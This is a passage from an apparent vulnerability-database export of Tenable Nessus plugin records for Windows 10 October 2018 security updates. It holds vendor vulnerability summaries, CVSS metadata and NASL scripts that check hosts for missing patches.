(CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2018-8333)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\");\n # https://support.microsoft.com/en-us/help/4462917/windows-10-update-kb4462917\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8713dae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462917');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462917])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462922.NASL", "href": "https://www.tenable.com/plugins/nessus/118000", "published": "2018-10-09T00:00:00", "title": "KB4462922: Windows 10 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118000);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8503\"\n );\n script_bugtraq_id(105477);\n script_xref(name:\"MSKB\", value:\"4462922\");\n script_xref(name:\"MSFT\", value:\"MS18-4462922\");\n\n script_name(english:\"KB4462922: Windows 10 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. 
An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\");\n # https://support.microsoft.com/en-us/help/4462922/windows-10-update-kb4462922\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fbae3c83\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462922');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462922])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462937.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. 
The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. 
An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462937.NASL", "href": "https://www.tenable.com/plugins/nessus/118004", "published": "2018-10-09T00:00:00", "title": "KB4462937: Windows 10 Version 1703 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118004);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8512\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462937\");\n script_xref(name:\"MSFT\", value:\"MS18-4462937\");\n\n script_name(english:\"KB4462937: Windows 10 Version 1703 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462937.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. 
An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. 
An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\");\n # https://support.microsoft.com/en-us/help/4462937/windows-10-update-kb4462937\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?035901c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462937.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 